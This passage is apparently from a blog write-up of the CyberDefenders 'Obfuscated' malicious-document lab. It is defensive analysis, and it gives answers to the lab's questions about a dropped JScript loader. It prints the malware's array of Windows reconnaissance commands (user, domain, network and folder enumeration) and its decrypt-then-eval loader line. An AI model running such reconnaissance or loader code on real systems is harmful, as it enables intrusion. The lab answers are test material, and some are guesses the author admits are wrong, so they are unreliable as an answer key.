</pre><td class="rouge-code"><pre>var auME = new Array('systeminfo &gt; ', 'net view &gt;&gt; ', 'net view /domain &gt;&gt; ', 'tasklist /v &gt;&gt; ', 'gpresult /z &gt;&gt; ', 'netstat -nao &gt;&gt; ', 'ipconfig /all &gt;&gt; ', 'arp -a &gt;&gt; ', 'net share &gt;&gt; ', 'net use &gt;&gt; ', 'net user &gt;&gt; ', 'net user administrator &gt;&gt; ', 'net user /domain &gt;&gt; ', 'net user administrator /domain &gt;&gt; ', 'set  &gt;&gt; ', 'dir %systemdrive%\\Users\\*.* &gt;&gt; ', 'dir %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.* &gt;&gt; ', 'dir %userprofile%\\Desktop\\*.* &gt;&gt; ', 'tasklist /fi "modules eq wow64.dll"  &gt;&gt; ', 'tasklist /fi "modules ne wow64.dll" &gt;&gt; ', 'dir "%programfiles(x86)%" &gt;&gt; ', 'dir "%programfiles%" &gt;&gt; ', 'dir %appdata% &gt;&gt;');
</pre></table></code></div></div><p>It creates some script ojbects runs them, there’s some C2 stuff, a username generator, and attempts to create persistent tasks.</p><p>I don’t think I’m gonna get a great idea of what exactly it does without executing it, so I’m gonna start seeing what questions I can answer.</p><h1 id="questions">Questions</h1><h2 id="what-is-the-sha256-hash-of-the-doc-file">What is the sha256 hash of the doc file?</h2><p>Pretty easy, we got this earlier by running sha256sum on the file.</p><p><code class="language-plaintext highlighter-rouge">ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751</code></p><h2 id="multiple-streams-contain-macros-in-this-document-provide-the-number-of-lowest-one">Multiple streams contain macros in this document. Provide the number of lowest one</h2><p>See above again, stream 8 is the answer</p><h2 id="what-is-the-decryption-key-of-the-obfuscated-code">What is the decryption key of the obfuscated code?</h2><p>This is the string we inserted as a static variable in the JS script, <code class="language-plaintext highlighter-rouge">EzZETcSXyKAdF_e5I2i1</code></p><h2 id="what-is-the-name-of-the-dropped-file">What is the name of the dropped file?</h2><p>This is our buddy <code class="language-plaintext highlighter-rouge">maintools.js</code></p><h2 id="this-script-uses-what-language">This script uses what language?</h2><p>Good ol javascript, but the answer they want is <code class="language-plaintext highlighter-rouge">JScript</code></p><h2 id="what-is-the-name-of-the-variable-that-is-assigned-the-command-line-arguments">What is the name of the variable that is assigned the command-line arguments?</h2><p>The command line argument was the decryption key, that was assigned to <code class="language-plaintext highlighter-rouge">wvy1</code></p><h2 id="how-many-command-line-arguments-does-this-script-expect">How many command-line arguments does this script expect?</h2><p>It expects 1</p><h2 id="what-instruction-is-executed-if-this-script-encounters-an-error">What instruction is executed if this script encounters an error?</h2><p>We had to remove this since nodejs doesn’t know what it is <code class="language-plaintext highlighter-rouge">WScript.Quit()</code></p><h2 id="what-function-returns-the-next-stage-of-code-ie-the-first-round-of-obfuscated-code">What function returns the next stage of code (i.e. the first round of obfuscated code)?</h2><p>This is <code class="language-plaintext highlighter-rouge">y3zb</code>, look at that first line of the script, y3zb is the first one called</p><div class="language-js highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="k">try</span><span class="p">{</span><span class="kd">var</span> <span class="nx">wvy1</span> <span class="o">=</span> <span class="nx">WScript</span><span class="p">.</span><span class="nx">Arguments</span><span class="p">;</span><span class="kd">var</span> <span class="nx">ssWZ</span> <span class="o">=</span> <span class="nx">wvy1</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="kd">var</span> <span class="nx">ES3c</span> <span class="o">=</span> <span class="nx">y3zb</span><span class="p">();</span><span class="nx">ES3c</span> <span class="o">=</span> <span class="nx">LXv5</span><span class="p">(</span><span class="nx">ES3c</span><span class="p">);</span><span class="nx">ES3c</span> <span class="o">=</span> <span class="nx">CpPT</span><span class="p">(</span><span class="nx">ssWZ</span><span class="p">,</span><span class="nx">ES3c</span><span class="p">);</span><span class="nb">eval</span><span class="p">(</span><span class="nx">ES3c</span><span class="p">);</span>  
</pre></table></code></div></div><h2 id="the-function-lxv5-is-an-important-function-what-variable-is-assigned-a-key-string-value-in-determining-what-this-function-does">The function LXv5 is an important function, what variable is assigned a key string value in determining what this function does?</h2><p>This function is assigned the alphabet so it can construct strings</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>}function LXv5(d27x){var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;var j;var n6T8;if (d27x.length % 4 &gt; 0)
</pre></table></code></div></div><h2 id="what-encoding-scheme-is-this-function-responsible-for-decoding">What encoding scheme is this function responsible for decoding?</h2><p>The big block of text is base64 encoded, you seen it enough you just know, but the <code class="language-plaintext highlighter-rouge">=</code> at the end is another giveaway</p><h2 id="in-the-function-cppt-the-first-two-for-loops-are-responsible-for-what-important-part-of-this-function">In the function CpPT, the first two for loops are responsible for what important part of this function?</h2><p>I didn’t get this one, even with the hints. I tried AES, because I saw the IV value set, but wasn’t sure, encryption isn’t my strong suit. I also tried RC4, CBC, XOR, and no dice. Either I am way off or its not being input in the format the want???</p><h2 id="the-function-cppt-requires-two-arguments-where-does-the-value-of-the-first-argument-come-from">The function CpPT requires two arguments, where does the value of the first argument come from?</h2><p>This variable came from the <code class="language-plaintext highlighter-rouge">command-line argument</code></p><h2 id="for-the-function-cppt-what-does-the-first-argument-represent">For the function CpPT, what does the first argument represent?</h2><p>They first arg is the <code class="language-plaintext highlighter-rouge">key</code></p><h2 id="what-encryption-algorithm-does-the-function-cppt-implement-in-this-script">What encryption algorithm does the function CpPT implement in this script?</h2><p>Gonna guess RC4 here</p><h2 id="what-function-is-responsible-for-executing-the-deobfuscated-code">What function is responsible for executing the deobfuscated code?</h2><p><code class="language-plaintext highlighter-rouge">eval</code> was the big one we defanged, that’s the one</p><h2 id="what-windows-script-host-program-can-be-used-to-execute-this-script-in-command-line-mode">What Windows Script Host program can be used to execute this script in command-line mode?</h2><p>That’ll be <code class="language-plaintext highlighter-rouge">CScript.exe</code></p><h2 id="what-is-the-name-of-the-first-function-defined-in-the-deobfuscated-code">What is the name of the first function defined in the deobfuscated code?</h2><p>We can look at the deobfuscated code and see <code class="language-plaintext highlighter-rouge">function UspD(zDmy)</code> was defined first</p><h2 id="all-done">All Done</h2><p>Ok that’s all done. What a good one, I was able to pull some IOCs and answer almost all the questions. Once I was done, I took a look at the write up in the video and saw the wrong answer I had, I was way off lol. This took me a few different nights over several weeks, maybe an hour or two here and there for a total of about 4 hours of effort.</p><p>It was vindicating to see that the processes I use (which are admittedly somewhat janky) still work. In a real situation, I would have probably leaned heavier on a sandbox I hope whoever I work for at the time would be paying for or go through manual steps like this. Another option, especially if I don’t care about the details and just wanna pull IOCs out, is to run it in a malware detonation VM with something like Sysmon or an EDR running to see what it catches.</p><p>Typically with something like this, I want Hashes, URLs, file names, process names, command line arguments, and other similar IOCs so I can scope the breadth of the infection in an environment. At home, on cyberdefenders.org, I just wanna see how many points I get.</p><p>Thanks for reading, hope you got something out of this.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/lab/'>lab</a>, <a href='/categories/workflow/'>workflow</a>, <a href='/categories/training/'>training</a>, <a href='/categories/dfir/'>dfir</a>, <a href='/categories/maldoc/'>maldoc</a>, <a href='/categories/malware/'>malware</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=CyberDefenders - Obfuscated - Notepad+++&url=https://remotephone.github.io/posts/CyberDefenders_Obfuscated/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=CyberDefenders - Obfuscated - Notepad+++&u=https://remotephone.github.io/posts/CyberDefenders_Obfuscated/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=CyberDefenders - Obfuscated - Notepad+++&url=https://remotephone.github.io/posts/CyberDefenders_Obfuscated/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/what-is-markdown/">What is Markdown anyway?</a></li><li><a href="/posts/welcome-to-jekyll/">Welcome to My Scratchpad</a></li><li><a href="/posts/reverse-shell-cheatsheet/">Reverse Shell Cheat Sheet</a></li><li><a href="/posts/practical-docker-part2/">Practical Docker for Security Admins - Part 2</a></li><li><a href="/posts/practical-docker/">Practical Docker for Security Admins - Part 1</a></li></ul></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/CyberDefenders_GitTheGate/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Aug 30, 2021 <i class="unloaded">2021-08-30T12:29:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>CyberDefenders - GitTheGate</h3><div class="text-muted small"><p> GitTheGate Back again for another CyberDefenders post. This is GitTheGate and I’ll work this like the last one, poke around before I answer any questions. The prompt is pretty self-explanatory Ov...</p></div></div></a></div><div class="card"> <a href="/posts/HoneyPot-Forensics/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 8, 2021 <i class="unloaded">2021-12-08T22:49:00-06:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HoneyPot Forensics</h3><div class="text-muted small"><p> A Helpful Tweet I saw this tweet and thought it would be interesting to take a look around. I will pick something specific in the evidence, take a look at it, and write about what I find. Some St...</p></div></div></a></div><div class="card"> <a href="/posts/Messing-Around-With-Memory-Dumps/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Feb 2, 2020 <i class="unloaded">2020-02-02T23:00:00-06:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Messing Around with Memory Dumps</h3><div class="text-muted small"><p> Why am I here? This handy tweet was posted on twitter sharing a memory dump to look into. I don’t do much of any memory analysis at work, so I figured I’d stumble through this, write what I found,...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/CyberDefenders_GitTheGate/" class="btn btn-outline-primary"><p>CyberDefenders - GitTheGate</p></a> <a href="/posts/AWS_SNS_Spending_All_My_Money/" class="btn btn-outline-primary"><p>AWS SNS - Spending All My Money</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/remotephone">remotephone</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-158754701-1', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://remotephone.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
